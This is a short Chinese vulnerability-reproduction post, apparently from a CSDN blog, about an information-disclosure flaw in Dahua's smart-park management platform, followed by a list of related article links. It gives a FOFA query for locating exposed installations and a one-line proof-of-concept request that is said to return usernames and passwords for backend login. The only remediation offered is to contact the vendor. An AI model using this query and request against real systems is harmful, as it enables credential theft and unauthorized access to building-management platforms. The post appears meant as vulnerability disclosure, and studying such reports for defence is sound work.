【漏洞复现】大华智慧园区综合管理平台信息泄露漏洞

Nx01 产品简介

大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台旨在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

Nx02 漏洞描述

大华智慧园区综合管理平台存在信息泄露漏洞,攻击者通过此漏洞获取用户名及密码进行后台登陆。

Nx03 产品主页

fofa-query: app.name="Dahua 大华 智慧园区管理平台"

Nx04 漏洞复现

POC:

/admin/user_getUserInfoByUserName.action?userName=system

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
wenxiaocsdn3 分钟前
某科技局国产服务器PVE虚拟化技术文档
运维·服务器
独行soc8 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍06-基于子查询的SQL注入(Subquery-Based SQL Injection)
数据库·sql·安全·web安全·漏洞挖掘·hw
远游客07138 小时前
centos stream 8下载安装遇到的坑
linux·服务器·centos
独行soc9 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍08-基于时间延迟的SQL注入(Time-Based SQL Injection)
数据库·sql·安全·渗透测试·漏洞挖掘
fantasy_arch9 小时前
CPU性能优化-磁盘空间和解析时间
网络·性能优化
LIKEYYLL10 小时前
GNU Octave:特性、使用案例、工具箱、环境与界面
服务器·gnu
Clockwiseee10 小时前
php伪协议
windows·安全·web安全·网络安全
黑客Ash11 小时前
安全算法基础(一)
算法·安全
云云32111 小时前
搭建云手机平台的技术要求?
服务器·线性代数·安全·智能手机·矩阵
云云32111 小时前
云手机有哪些用途?云手机选择推荐
服务器·线性代数·安全·智能手机·矩阵